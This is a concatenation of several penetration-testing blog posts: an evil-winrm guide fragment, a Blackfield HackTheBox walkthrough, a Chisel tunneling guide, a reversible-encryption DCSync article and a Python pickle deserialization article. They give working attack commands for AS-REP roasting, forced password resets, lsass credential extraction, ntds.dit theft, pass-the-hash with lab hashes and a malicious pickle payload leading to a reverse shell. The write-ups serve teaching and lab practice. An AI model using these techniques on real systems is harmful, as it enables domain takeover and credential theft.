There is no doubt that evil-winrm has given its best to make our work easy as possible. We always need to transfer files from Attacking machine to remote machine in order to perform enumeration or other things. Instead of setting python server and download it from the target system, we can simply use upload command with filename. This is life saving feature that evil-winrm tool is giving especially in such scenarios when we face outbound traffic rules are set in the target system and when we are using evil-winrm with proxies. In the below example we are uploading notes.txt file in the target system.

upload /root/notes.txt .



Similarly, we can download the file from the target system to the attacker machine using downloadcommand along with the file name.

download notes.txt /root/raj/notes.txt



We can verify it by navigating the path we downloaded notes.txt in the attacking machine.



Use Evil-winrm From Docker

This tool also can be installed in the docker. If we have another system is in the docker where evil-winrm is installed, then we can also call it from the docker. It will work same as it was working in the main base system without any problem. To do that, follow the docker syntax along with evil-winrm command to call it from the docker.

docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'



Login with key using Evil-winrm

Evil-winrm also allows us to use public and private key to establish a remote session using -c flag for the public key and -k flag for the private key. In addition, we can also add -S flag to enable SSL to make our connection encrypted and secure.

evil-winrm -i 10.129.227.105 -c certificate.pem -k priv-key.pem -S



Conclusion:

We have explored Evil-winrm tool briefly and its special features which will going to make our Internal assessment much easier. We have explored multiple techniques to establish remote session using evil-winrm. Also, we have explored some of its advanced features which will enhance our productivity in the production environment as well as in the CTFs. Lastly, I would like to thank Hackplayers for making such a great tool. I hope you have learned something new today. Happy hacking!

Blackfield HacktheBox Walkthrough

0
0

Summary

Blackfield is a windows Active Directory machine and is considered as hard box by the hack the box. This box has various interesting vulnerabilities, and security misconfigurations were placed. As usual, we began with a basic nmap scan as a part of enumeration and noticed smb null session was enabled. Then we discovered a pre-authentication disabled account and performed AS-Rep Roasting, and cracked the obtained hash. With the extracted password, we were able to enumerate the users available in the AD using RPC Client.

Moving laterally, we used bloodhound and noticed that a user could change another user's password, which could be done using RPC Client. After changing the password of another user, we accessed the shared folder, where we found an interesting file as memory-dumped data. Using mimikatz, we extracted the NTLM hash of the backup user from the lsass memory. The further enumeration in order to find the privilege escalation vector, we discovered the current user belongs to the backup operator group, and the sebackup privilege was enabled. With the privileged assigned to the current user, we were able to copy ntds.dit file and system hive.

 Lastly, we used the impacket secretdump tool to extract the administrator hash from the ntds.dit file with the help of the system hive. After obtaining the administrator hash, we logged in as an administrator and collected the root flag. So, without spoiling it more, let's exploit it step by step.

Table of content

Initial Access

  • Initial Nmap TCP Port Scan

  • SMB Share Enumeration

  • Searching for the No Pre Auth (NPU) configured users

  • Krb5asrep hash cracking with john

  • RPC Client Enumeration

  • Setting up Neo4j Console

  • Export JSON files in Ne04j Console for the analysis

  • Analysing AD Hidden Relationship with other users

  • Attempt to change user password using RPC Client

  • Workgroup enumeration of audit2020 user

  • Extract data from the lsass.DMP file

  • User Shell

Privilege Escalation

·         Exploiting Enabled Dangerous Privileges

·         Transfer disk shadowing DOS file to the target system

·         Copy ntds.dit file using assigned privilege

·         Make a copy of the system hive

·         Dump password hash from ntds.dit file Root flag

Let’s exploit it step by step.

 

Initial Access

We are going to start the assessment with the normal TCP/IP port scanning.

 

Initial Nmap TCP Port Scan

We begin with the port scan, where we use nmap to find out which ports are open and what services are running in the target host. Nmap is a popular port scanning tool that comes with Kali Linux. To perform a port scan, we have used -sV flag against the target system, which scans the top 1000 ports with the service version.

Flags features:

-sV :  Attempts to determine the service version

 

From the nmap scan, we have found eight ports are open where most of the services belong to the Active Directory environment. Any of these services can lead us toward any protocol-based vulnerabilities or any security misconfiguration, which is common in an active directory environment. Also, it is showing the domain name as BLACKFIELD.local.

nmap -sV 10.129.45.226

 


SMB Share Enumeration

The Server Message Block (SMB) protocol is a network file-sharing protocol that allows applications on a computer to read and write to files and request services from server programs in a computer network. It can be seen in the internal network that smb share is enabled for the null session, which means a user can access that shared folder without authentication or with no password. Firstly, we listed all available shares using smbclient tools, which come with kali Linux by default. From the output, we noticed that $profiles directory has no comment, and we attempted to log in without a password and successfully logged in. After logging into smb share, we found there are so many directories we can access where all directories look empty as the size is showing its bytes in 0.

smbclient -L 10.129.45.226





 

 We added the domain name BLACKFIELD.local in our /etc/host file before continuing further enumeration. To do that, we can use any text editor such as leafpad, nano, gedit.etc.



 

Searching for the No Pre Auth (NPU) configured users

As a threat actor, we are going to test all potential vulnerabilities that exist in an Active Directory environment. Suppose an admin has configured an account with no pre-authentication required; then the user does not need to request KDC to access any service or resources where an attacker can take advantage of the configuration and try to steal password hashes of the user that have Kerberos pre-authentication disabled. Then the attacker can try extracting a plain text password from the obtained hash. This attack is also known as AS-REP Roasting. Similarly, we tried to obtain any user's password hash using the impacket library GetNPUsers and stored the result in the result.txt file. As a result, we found that the supportaccount has no pre-authentication set and extracted its password hash. After obtaining the hash, we can try to crack it using offline tools such as john and hashcat.

In the below command, we have used the –dc-ip flag for the domain IP address with the domain name and the -userfileflag to give a list of potential users. Then we used the grep utility to filter our results.

impacket-GetNPUsers -dc-ip 10.129.45.226 blackfield.local/ -usersfile username.txt > result.txt



 Krb5asrep hash cracking with john

We stored the obtained hashes in a hash file. Then we used john to crack the hashes in a plain text format issuing breached password wordlists that come with Kali Linux. Rockyou.txt file contains a list of commonly used password words. This file contains over 14,341,564 passwords that were previously leaked in data breaches. The tool did its job very well and cracked the hashes into human-readable form.

Cracked password: #00^BlackKnight

john --wordlist=/usr/share/wordlists/rockyou.txt hash



 

 RPC Client Enumeration

Next, we attempted to log into RPC Client using obtained credentials and listed all AD users, where we noticed three default accounts and two non-default account users. Remote Procedure Call (RPC) protocol is generally used to communicate between processes on different workstations. However, RPC works just as well for communication between different processes on the same workstation.

rpcclient -U support%#00^BlackKnight 10.129.45.226



AD Reconnaissance with Blood Hound

As we have valid user account credentials, we decided to map the relationship of support users with other users. For example, audit2020 or an administrator. To map the domain relationship, we are using a popular tool called bloodhound. Bloodhound also comes with Kali Linux and allows to map domains remotely if an attacker has valid credentials of an active directory user. In the below command, we are collecting all domain information where we have provided different flags, the username(-u), password(-p), the domain name(-d), the name server(-ns), and collection method(-c).

 

bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.129.45.226 -c all



Setting up Neo4j Console

Then,we started the Neo4j Console to analyze the collected files by a bloodhound. This tool gives an interactive console for graphs with integrated visualization. To start the Console, just issue the below command. Once it is ready, then we require to access our loopback interface on its default port, 7474.

 

 

Export JSON files in Ne04j Console for the analysis

We need to import all the JSON files in the Console. To do that, we can simply drag all files in the Console or use the import feature available in the neo4j.



Analysing AD Hidden Relationship with other users

After importing files, we will be seeing user relationships with graph visualization. The Neo4j property graph database model consists of: Nodes that describe entities (discrete objects) of a domain. Nodes can have zero or more labels to define (classify) what kind of nodes they are. Relationships describe a connection between a source node and a target node. From the node info tab, we noticed the “First Degree Object control," which shows the relationship of the support user with audit2020, where the support user has the right to change the audit2020 password.



 

Attempt to change user password using RPC Client



As we know, the support user has the privilege to change the audit2020 user's password. We searched for ways to utilize this privilege and found a blog. In the blog, it is suggested to use 23 as a level when an attempt to change any user's password using an RPC client. And also mentioned that will not be able to change the password of anyone with AdminCount = 1 (aka Domain Admins and other high priv accounts). Following the blog, we attempted to change the password of user audit2020 after authenticating as a support user in RPC Client and successfully changed the password.

Reference: https://malicious.link/post/2017/reset-ad-user-password-with-linux/

 

setuserinfo2 audit2020 23 'Password@1'

 

Workgroup enumeration of audit2020 user

After changing the audit2020 password, we logged in to smb shared folder named forensic. In the forensic folder, we found an interesting folder named memory_analysis, where we discovered another file named lsass.zip. LSASS file can be interesting for a threat actor because lsass.exe stores authentication credentials like encrypted passwords, NT hashes, LM hashes, and Kerberos tickets in memory. Storing these credentials in memory lets users access and share files during active Windows sessions without re-entering the credentials every time they need to perform a task. We downloaded the lsass.zip file in our local system for further analysis by running the following command. Then we unzipped it and found lsass.DMP file, which looks like holding lsass dumped memory in it.

smbclient -U 'audit2020'  //10.129.45.226/forensic

get lsass.zip



 

Extract data from the lsass.DMP file

In order to extract the data from the lsass.DMP file, we utilized a powerful tool called mimikatz. Mimikatz is a tool that is commonly used by hackers and security professionals to extract sensitive information, such as passwords and credentials, from a system's memory. To do that, we can use mimikatz in a windows system with a system privileged shell, as mimikatz does not work in a low privileged shell. Follow the below command to extract the data from the lsass.DMP file. As expected, mimikatz dumped the NTLM hashes from the lsass.DMP file. Now we are in a position to try authenticating using pass the hash technique as svc_backup user. There is a nice article by the hacking articles that can be used to utilize pass the hash technique in multiple ways.

URL: https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/

 

privilege:debug

sekurlsa::minidump lsass.DMP

 



 

User Flag

With obtained credentials, we logged in as a svc_backup user using winrmservice, which runs on port 5985 by default. In the nmap result, we did not see this port open because nmap only scans the top 1000 ports where PowerShell remoting port does not count in. We can grab user flag from the svc_backup desktop directory. Then we checked the privileges assigned to the current user and found that the sebackup privilege and serestore privilege is enabled.

evil-winrm -i 10.129.45.226 -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'



 

Privilege Escalation

Privilege escalation is the process of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. Privilege escalation can be used by attackers to gain access to more system functions and data than intended by the root user. In some cases, privilege escalation can allow attackers to gain complete control of the system.

Exploiting Enabled Dangerous Privileges


After enumerating further about the svc_backup user, we found that the user is also a member of the backup operators group. A backup operator group member has the privilege to make a disk shadow copy and access all files owned by the system. With a quick search, we got another article published by hacking articles backup privilege escalation techniques. Following the blog, we created a file instructing disk shadow to create a copy of C: Drive into Z: drive as alias raj and saved it as raj.dsh file. The DSH file extension indicates to your device which app can open the file. However, different programs may use the DSH file type for different types of data. Then we compiled it into DOS format to use in the windows host.

https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/

 

leafpad raj.dsh

set context persistent nowriters

add volume c: alias raj

create

expose %raj% z:

unix2dos raj.dsh

Transfer disk shadowing DOS file to the target system

After compilation, we transferred raj.dsh file into the target temp directory that we created. Here evil-winrm made our job easy since it added an upload feature in it, which means we do not require transfer files in the traditional way here. We confirmed that raj.dsh file is uploaded successfully in the C:\temp directory.

mkdir temp

cd temp

upload raj.dsh

Copy ntds.dit file using assigned privilege

Execution of the dsh file in the target system exposed a shadow copy of C:\ drive in the Z:\ drive. Now we are in the position to make a copy of ntds.dit file in an accessible directory. We used the robocopy utility to make a copy of ntds.dit file from Z:\windows directory to the current present working directory. Steps to reproduce this proof of concept follow the below commands:

cd C:\Temp

upload raj.dsh

diskshadow /s raj.dsh

robocopy /b z:\windows\ntds . ntds.dit



Make a copy of the system hive

To perform this attack successfully, we will also require having a system hive otherwise, we will not be able to extract the hashes from the ntds.dit file. A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files loaded into memory when the operating system is started, or a user logs in. Each time a new user logs on to a computer, a new hive is created for that user with a separate file for the user profile. So, we copied the system hive in the temp directory and transferred it into the attacking machine.

 

reg save hklm\system C:\Temp\system

cd C:\Temp

download ntds.dit

download system

 



Dump password hash from ntds.dit file

Once system hive and ntds.dit files are transferred to the attacking machine, then we attempt to extract the hashes from the ntds.dit file using impacket secretsdump. Secretdump extracted all user's hashes along with the administrator.

impacket-secretsdump -ntds ntds.dit -system system local

 



 

Root Flag

Again, we can utilize the pass-the-hash technique to gain an administrator shell with obtained hash. We authenticated as an administrator successfully and grabbed the root flag from the administrator desktop directory.

evil-winrm -i 10.129.45.226 -u administrator -H '184fb5e5178480be64824d4cd53b99ee'



 

 

Conclusion:

This machine was fun and was a great source of learning, where we learned and explored so many things such as TCP port scan, service enumeration, AS-REP Roasting, RPC Client functionalities and role in AD Environment, Hash cracking, smb share enumeration, Bloodhound user hidden relationship mapping, examining dumped data, pass the hash, windows active directory dangerous privileges that can lead to privilege escalation.

Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!

 

Author: Subhash Paudel is a Penetration Tester and a CTF player who has a keen interest in various technologies and loves to explore more and more. Additionally, he is a technical writer at Hacking articles. Contact here: https://au.linkedin.com/in/subhash-paudel-a021ab207, https://twitter.com/subhashpaudel94

 

 

 

 

 

A Detailed Guide on Chisel

0
0

 A Detailed Guide on Chisel

Background of Port forwarding:

Port forwarding in a computer network, also known as port mapping of network address transition (NAT), redirects a communication request from one address and port number combination to another while packets traverse a network gateway such as a firewall or a router. It is used to keep unwanted traffic off. A network administrator uses one IP address for all external communications on the internet while dedicating multiple servers with different IPS and ports internally to do various tasks based on organization requirements.

 

Table of content:

  • Introduction to Chisel

  • Establish a connection with the remote host

  • Local port forwarding Example - 1

  • Local Port forwarding Example - 2

  • Establish Connection with SOCKS5 Proxy

  • Configure SOCKS5 in proxychains4.conf file

  • Banner grabbing of the remote host with proxychains

  • Telnet Connection using proxychains

  • FTP connection using proxychains

  • VNC Viewer connection using proxychains

  • Conclusion

 

Introduction to Chisel

Chisel is open-sourced tool written in Go (Golang) language, mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. It is a fast TCP/UDP tunnel, transported over HTTP and secured via SSH. In addition, it requires two things to establish a connection between a remote host and the attacking box, where the attacking box will act as the server and the remote host as a client.

 

 

Establish a connection with the remote host

We are establishing a connection with the remote host with valid credentials. The remote host can be a target and tunneling point for the next hop. If there is another hop we can connect with, then the remote host will act as a routing point. We connected as the pentestuser with the host using SSH protocol which stands for secure socket shell and transmits data in encrypted form. Once we connect with the remote host, we will view the internal network status, which can be achieved using the following commands.

-a all interface

-n show ip address

-t show tcp connections

-p show process id/name

ssh pentest@192.168.1.15

netstat -antp


 


Installation

Chisel installation is straightforward in Kali Linux as it comes with a distribution package. We can install it using the below command.

apt install chisel



Local port forwarding Example - 1

In reverse port forwarding, it allows connecting to remote services hosted in an internal network. Here we are using a chisel utility to achieve our goal. It will require you to go through multiple steps. In the first step, we set up a reverse server in our base machine (Kali) by specifying a port number of 5000.

 


Once our Chisel server is ready and reverse tunneling is enabled, we will be required to transfer a chisel binary to the remote host. The chisel binaries can be downloaded from the official repository based on the system architecture. All the latest available binaries can be found by accessing the releases tab. As we will test it on a Linux system with AMD64 architecture, we selected the highlighted one.

Download link: https://github.com/jpillora/chisel/releases

 


After cloning the repository, it will be saved in the downloads folder in zip file format. Next, we will unzip the file using the gunzip utility. As mentioned earlier, we require to transfer it to the target system to set up a chisel as a client. To transfer the file, we set up a python server in our local system, which will host our file on port 80.

gitclone https://github.com/jpillora/chisel.git

gunzip chisel_1.7.7_linux_amd64.gz

python3 -m http.server 80

 


We downloaded the chisel binary in the remote host's /tmp directory, where everyone has full permission on files. Then we give full permission to file so we can execute it. Suppose we do not give appropriate permission to file. In that case, we cannot execute it as it is set only to read permission when we download anything in the temp directory as a low-privileged user. To establish a remote connection, we require a chisel server and a chisel client where the chisel server is the Attacking box, and the chisel server will be the target machine. As we have already set up a chisel server on port 5000 earlier, we are establishing a connection with the server. In this example, we mentioned chisel as a client and gave the server IP address and port number (5000). We then mentioned an accessing port (4444) and localhost with a port where HTTP service is hosted internally in the remote system.

wget 192.168.1.205/ chisel_1.7.7_linux_amd64

chmod 777 chisel_1.7.7_linux_amd64

./chisel_1.7.7_linux_amd64 client 192.168.68.141:5000 R:4444:localhost:8080

 


 


 

 

Local Port forwarding Example - 2

There is another way to access the HTTP service using the attacker's IP address instead of the loopback interface this time. We will be required to install a chisel in the target machine to achieve the goal. In this example, we are using the ubuntu system. As the chisel is written in Golang language, we need to install Golang in the target system using the below command.

apt install golang

Next, we download a chisel from its official repository to install it in the target system. Go build is an automatic build tool that aims to replace Make files for simple projects written in the Go programming language. It creates a dependency graph of all local imports and compiles them in the correct order using the GC Go compiler. The ldflags stands for linker flags and is used to pass in flags to the underlying linker in the Go toolchain. The -s and -w linker flags are not strictly needed, but they decrease the size of the resulting binary. By navigating the download folder of the chisel, we simply installed it with the help of go build.

git clone https://github.com/jpillora/chisel.git

apt install golang

go build -ldflags="-s -w"



Then we set up a chisel server on port 5000 in the attacking box as in the previous example. In the last example, we accessed it from the attacking box loopback interface, connecting to the service hosted in the remote internal network. This time we will access the HTTP service on port 8888 on the attacker side. Ubuntu machine, our client, will establish a connection with the remote server (192.168.1.205) and port 5000. Once a tunnel is created, it will allow accessing the HTTP service hosted in loopback (127.0.0.1) on remote port 8888.

./chisel client 192.168.1.205:5000 R:8888:localhost:8080



When a connection is established with the chisel server, we can access the HTTP service from the attacking box on port 8888.

 

Establish Connection with SOCKS5 Proxy

During the internal assessment, we may come across when we compromise a system, and that system is communicating with another system using a different adaptor or a different subnet. It can be checked using ipconfig/ifconfig, where we can view if that system is connected to a different network via a different adapter. In such scenarios, local port forwarding will not work, and we have to identify which ports are open for the outbound traffic. As shown in the screenshot below, we could not establish a connection with the remote host.



To overcome this issue, we have to go through multiple steps. First, we set up a chisel server in the attacking box on port 8000. 


Then we establish a connection with the chisel server from the ubuntu box mentioning remote access on socks proxy. Just like most other proxy types, SOCKS proxies hide the client's IP address and serve when bypassing geo-restrictions. Unlike HTTP, SOCKS cannot interpret web data. However, they are mainly used to facilitate communication with websites with firewalls and limit regular client access. All communication can be done on SOCKS5 proxy using utilities such as proxychains or proxychain4.

-p: listening port of the server (attacking box)

--socks5: start an internal SOCKS4/SOCKS5 proxy

--reverse: allows reverse port forwarding



We can also access an individual target's port using the command below. We connect with the server hosted in the Attacking machine and then access the target service via a tunnel.



Also, we can specify socks proxy while setting up the chisel server. In the below example, we have set up a chisel server on port 9001 using the socks5 proxy.



All the above setup is done at the system level, but how will the browser know we want to access HTTP service? So, we configured it in the browser as well. Otherwise, we cannot browse any HTTP or H TTPS services. To do that, we manually configured our browser by navigating settings as proxy SOCKS and a host as loopback interface IP address, 127.0.0.1, and SOCKS version such as SOCKS4 or SOCKS5, which depend on the version we are using. In this example, we are using SOCKS5 and port number 1080. And no proxy for the loopback interface. It can also be done using the foxyproxy addon available in Mozilla Firefox.



Now we can access the services without any issues. We can verify accessing the target HTTP service where the request will send via a proxy.

 


Configure SOCKS5 in proxychains4.conf file

 If proxychains4 is not configured for the socks5 proxy, we can make an entry in its configuration file using any text editor. The configuration file is located in the /etc as proxychains4.conf.



To edit the configuration file, we need to comment socks4 proxy if that is configured by default and add socks5 on the loopback interface with the port number. We can use any port, but in this example, we use port 1080.



Banner grabbing of the remote host with proxychains

Let's grab the banner of ports 21, 23, and 5900. Port 21 belongs to the File transfer protocol, 23 to the telnet, and 5900 to the VNC server. FTP transfers files from different sources to different destinations, and the telnet is used for the remote connection in the command line interface. On the other hand, VNC can be used to establish a GUI-based remote connection. To grab the banners or access the remote host, we have to use proxychains before using any command so the request will be made from the tunnel that we created. From the output, it is confirmed that all three ports are open. In our command, we have used -zvn options that stand for:

-n Do not do DNS or service lookups on specified addresses, hostnames, or ports.

-v Have nc give more verbose output.

-z Specifies that nc should only scan for listening daemons without sending any data to them.

proxychains nc -zvn 192.168.146.128 21 23 5900

 


Telnet Connection using proxychains

Telnet is a remoting protocol that does not encrypt the data while transmitting. It transmits data in a plain text format. Let's establish a telnet connection with valid credentials msfadmin/msfadmin. As expected, we successfully established a remote connection with the remote host using telnet protocol.

 proxychains telnet 192.168.146.128

 


FTP connection using proxychains

FTP (File Transfer Protocol) is a network protocol for transmitting files between computers over Transmission Control Protocol/Internet Protocol (TCP/IP) connections. Within the TCP/IP suite, FTP is considered an application layer protocol. Let's connect with the same credentials we used in telnet. We connected to ftp successfully, and with lscommand, we can list the available file in the directory.

proxychains ftp 192.168.146.128

 


VNC Viewer connection using proxychains

In the last example, we will connect with the VNC viewer. VNC Viewer is used for local computers and mobile devices you want to control from. A device such as a computer, tablet, or smartphone with installed VNC Viewer software can access and control a computer in another location. This service runs in its default port, 5900. To establish a connection with VNC, we can use proxychains using the vncviewer utility and the remote IP address, and we will receive a GUI-based interface.

proxychains vncviewer 192.168.146.128

 


 

Conclusion:

We have explored chisel briefly, which will make our Internal assessment much easier, especially when we come across port forwarding. We have explored multiple techniques to establish a remote session using a chisel with and without socks5 proxy. Also, we have explored proxychains role in a tunneled connection. I hope you have learned something new today. Happy hacking!

Author: Subhash Paudel is a Penetration Tester, Red Teamer, and a CTF player who has a keen interest in various technologies and love to explore more and more. Additionally, he is a technical writer at Hacking articles. Contact here: https://au.linkedin.com/in/subhash-paudel-a021ab207, https://twitter.com/subhashpaudel94

 

 

 

 

 

Credential Dumping – Active Directory Reversible Encryption

0
0

 Introduction

According to MITRE an adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.

·         MITRE TACTIC: Credential Dumping (ID: TA0006)

·         MITRE Technique Modify Authentication Process (T1556)

·         MITRE SUB ID:Reversible Encryption (T1556.005)

In Domain Controller user account reversible encryption is enabled, which means the encrypted data can be reversed back to the user’s password. The password stored with reversible encryption policy is not a hash since a function can be called to get back to the original clear-text password.

Do you know?

As per Microsoft: If you use the Challenge Handshake Authentication Protocol (CHAP) through remote access or InternetAuthentication Services (IAS), you must enable this policy setting. CHAP is an authentication protocol that is used by remote access and network connections. Digest Authentication in Internet Information Services (IIS) also requires that you enable this policy setting.

 

Table of content

·         Lab Setup

·         DC-Sync Attack-Dump Plain text Password

·         Mitigation

·         Conclusion

Lab Setup

Enabling Reversible encryption in Active Directory Users

There is multiple methods to enable Reversible encryption property:

1)      User Account Property

Enable the Reversible encryption by modify the account property for Domain User account.

 




2)      Powershell Command

set-ADUser – AllowReversiblePasswordEncryption $true



3)      Group policy Management-

Enable the store password using reversible encryption with Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\

 

Validate the property through User’s property-Attribute Editor for UserAccountControl.

 


NOTE: Now if the system Administrator reset the password for the user account, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled.

Enumeration

PowerShell Command to find user enabled with allow reversible password encryption.

Get-ADUser -Filter {AllowReversiblePasswordEncryption -eq "true"} | Select Name, sAMAccountName

Attack: DC-Sync

In our Pervious article we have describe about DCsyn attack, read more from here. You can download the DC Sync Script tool here.

Commands to execute in the domain controller to check user clear text password.

powershell.exe -ep bypass

Import-Module .\Invoke-DCSync.ps1

Invoke-DCSync -AllData

 


DCSync shows the clear-text password of target user.

 


Mitigation

  • Ensure that Allow Reversible Password Encryption property is set to disabled.

  • Group policy store password using reversible encryption is set to disable.

Conclusion

In this article, we were able to decrypt the password of active directory user accounts. This article can serve as a reference for Red Team activists for Credential Dumping – Active Directory Plain Text Password.

Python Serialization Vulnerabilities - Pickle

0
0

Introduction

Serialization gathers up the data from objects and converts them to a string of bytes, and writes to disk. The data can be deserialized and the original objects can be recreated. Many programming languages offer a way to do this including PHP, Java, Ruby and Python (common backend coding languages in web).

Let's talk about serialization in Python. In Python, when we can use the pickle  module, the serialization is called “pickling.”

Table of content

      Serialization in Python

      Serialization in Web Applications

      Over Pickling

      Python YAML vs Python Pickle

      Mitigation

      Demonstration

      Conclusion

 

 

Serialization in Python

While using Python, pickle.dumps() is used to serialize some data and pickle.loads() is used to deserialize it (pickling and unpickling). For eg: here is an array, pickled.

 

python3

>>> import pickle

>>> variable = pickle.dumps([1,2,3])

>>> print(variable)

b'\x80\x04\x95\x0b\x00\x00\x00\x00\x00\x00\x00]\x94(K\x01K\x02K\x03e.'

>>> pickle.loads(variable)

[1, 2, 3]

>>>

 

 



 

As we can see above, when we print the variable, we see a byte string. This is serialization. Later, with pickle.loads(variable) we are deserializing the object.

 

This is helpful in many cases, including when we want to save some variables from a program on the drive as a binary which can be later used in other programs. For example, let’s create an array and save it as a binary file.

 

import pickle

 

variable = pickle.dumps([1,2,3])

with open("myarray.pkl","wb") as f:

f.write(variable)

 



 

As we can see, a pickle binary is now stored on the drive. Let's read it using pickle again.

 

import pickle

obj = open("myarray.pkl","rb").read()

pickle.loads(obj)

 



 

As you can see, we can now operate on this deserialized object (obj) just like an array again! Throughout the SDLC, there may come a time where a developer would want to quit the IDE but wants to save all the data and states of variables at the moment, that is where this is a helpful feature.

 

 

Serialization in Web Apps

Okay, so we have talked about serialization in software applications. But what is the use of serialization in web apps? So, the HTTP is a stateless protocol. That is, the state of one request doesn't depend on the previous request. But sometimes there is a need to maintain state. That's why we have cookies. Cookies would bring a sense of statefulness in HTTP protocol.

 

If we want a user's information and some data to be retained next time they interact with the server, serialization is a wonderful use case. Just serialize some data, put it into a cookie (which is taking up user's storage and not server's! WoW) and next request just deserialize it and use it on the site.

 

Pickle is used in python web apps to do this. But one caveat is that it deserializes unsafely and its content is controlled by the client. Just adding, serialization in json is much safer! Unlike some other serialization formats, JSON doesn't allow executable code to be embedded within the data. This eliminates the risk of code injection vulnerabilities that can be exploited by malicious actors.

 

It is possible to construct malicious pickle data which will execute arbitrary code!

 

 

Over Pickling

We have talked about pickling well known data types like an array. But what if we were to pickle our own custom classes? Python can easily understand and deserialize well known classes but what will it do with custom classes like connection to servers and all those fancy networking scripts? It doesn't even make sense to serialize those but Python developers added a way to pickle that too. There is a chance that discrepancies might happen when python tries to deserialize such objects.

 

Custom pickling and unpickling code can be used. When you define a class you can provide a mechanism that states, 'here is what you should do when someone asks to unpickle you!' So when python goes to unpickle this string of bytes, it might have to run some code to figure out how to properly reconstruct that object. This code will be embedded in this pickle file.

 

Let's see a small example.

 

Here is a code for proof of concept. This code is creating a class called EvilPickle. To implement support for pickling on your custom object, you define a method called "__reduce__" which returns a function and pair of arguments to call that function with. Here, a simple "cat /etc/passwd" would be run using os.system function. Finally, this would be written in a binary file called backup.data.

 

python

import pickle

import os

class EvilPickle(object):

  def __reduce__(self):

    return (os.system, ('cat /etc/passwd', ))

pickle_data = pickle.dumps(EvilPickle())

with open("backup.data", "wb") as file:

  file.write(pickle_data)

 

The idea here is to make the deserializer run cat /etc/passwd on their system. Let's try it out now! We save the above code in evilpickle.py file and run it. Just to check, we'll cat the backup.data file. Here we can clearly see something fishy!

 

The user deserializes it anyway and ends up giving out /etc/passwd file.

 

python

import pickle

pickle.loads(open("backup.data","rb").read())

 



 

We can get even more nerdy and see what is happening under the hood by disassembling using pickletools. Here, the pickling is done on unix like os (posix) which is stored in a SHORT variable and stored in as 0 and each successive command after that in different numeric values on the stack. The `REDUCE` opcode is used to call a callable (typically a Python function or method, here os.system (represented as posix and system)) with arguments (called TUPLE. here, cat /etc/passwd). And finally, the program is stopped.

 

The primary difference between tuples and lists is that tuples are immutable as opposed to lists which are mutable. Therefore, it is possible to change a list but not a tuple. The contents of a tuple cannot change once they have been created in Python due to the immutability of tuples.

 

python3 -m pickletools -a backup.data

 

note: -a options gives some info about each steps while using pickletools

 



 

So since the pickle object is user controlled and it unpickles at server, we can even use this to get remote server shell as well (using sockets and pickling it and finally providing it to the server)

PyTorch ML model up until recent times used pickle for serialization of ML models and was vulnerable to arbitrary code execution. Safetensors overcame this issue.

 

 

Python YAML vs Python Pickle

Python YAML is another serialization format instead of pickle. But even Python YAML allows execution of arbitrary code by default. Here is another POC:

 

import yaml

document = "!!python/object/apply:os.system ['cat /etc/passwd']"

yaml.load(document)

 

This would also execute cat /etc/passwd. We can avoid this by using "safe_load()" instead of load anyway!

 

 

Mitigation

Pickle is just one module in Python. This is a very well known tool and developers use it still but if the developers are a little more mindful, they’ll not ignore the warning shown below on pickle’s documentation page:



 

Alternatives to pickle and brief POCs on them are as follows:

 

1. JSON

 

import json

 

# Serialize

data = {"key": "value"}

json_data = json.dumps(data)

 

# Deserialize

deserialized_data = json.loads(json_data)

 

 

2. msgpack

 

import msgpack

 

# Serialize

data = {"key": "value"}

msgpack_data = msgpack.packb(data)

 

# Deserialize

deserialized_data = msgpack.unpackb(msgpack_data, raw=False)

 

Some other safe options to use would be: protobuf by google, CBOR.

 

 

Demonstration

Okay, so the given website is a note taking website which is using serialization. Here is what happens when I submit a note with a PNG image.

 



 

This looks something like this when processed by the server. Observe the URL which is rendering a .pickle file

 



 

The challenge also provided us with an app.py source code which tells us all about the background logic. I can’t post the entire code but here are some relevant snippets.



 

As we can see, the code is accepting title, content and image as an object, pickling it and storing it in title.pickle

 

Here are the key functions of the code:

 

1. Note() class accepts an object new_note with 3 items: title, content, image_filename.

2. save_note() is calling pickle.dumps() to pickle new_note. save_note() is also called to store an image using image.save which is a flask function. Similarly image.filename extracts image's filename.

3. secure_filename() function converts insecure names to secure ones. For example: note 1 becomes note_1, ../../../etc/passwd becomes etc_passwd

4. unpickle_file is loading the pickled file provided to it and unpickles it.

 

Here are some key takeaways about the functionality of the code:

 

1. Site is accepting 3 key items.

2. It is not checking if PNG is safe or not (as in if it is a valid PNG or not. This is a good attack point)

3. All in all, PNG file upload is a really strong contender to put code in because: a, site isn't validating safety of PNG and b, it will unpickle any file we provide.

 

I tried with a simple cat /etc/passwd command on my local machine and the evil.png pickled file was deserializing properly!

 

import pickle

import os

class EvilPickle(object):

  def __reduce__(self):

    return (os.system, ('cat /etc/passwd', ))

pickle_data = pickle.dumps(EvilPickle())

with open("evil.png", "wb") as file:

  file.write(pickle_data)

 



 

Let's take it a step further and use a netcat listener to receive data from deserialized local execution of evil.png and have it give us a shell!



 

By following the same logic, we could exploit the server. First I create a PNG file and upload it on the server.



 

The uploaded data becomes a pickle file which gets stored on the server and when it is called, data is visible on the screen (it is unpickled).



 

Finally we access the uploaded PNG file on the server.



 

We get a reverse shell on the netcat listener we set up this way!

This is how we root the box! Please note that I hid and altered a few details throughout the CTF section of the article because the CTF is still an ongoing challenge and I couldn’t obtain permission to post a complete solution.

 

Conclusion

Serialization vulnerabilities are easy to exploit and easy to overlook by developers. One can even achieve arbitrary code execution on machines. As we saw, when deserialization insecurely or by using insecure functions, we put our infrastructure at risk for compromise. Developers should carefully read the documentation page and not ignore warnings. And finally, use languages like json to serialize/deserialize data which can’t be used to contain executable code since it is a data-only language. Thanks for reading.

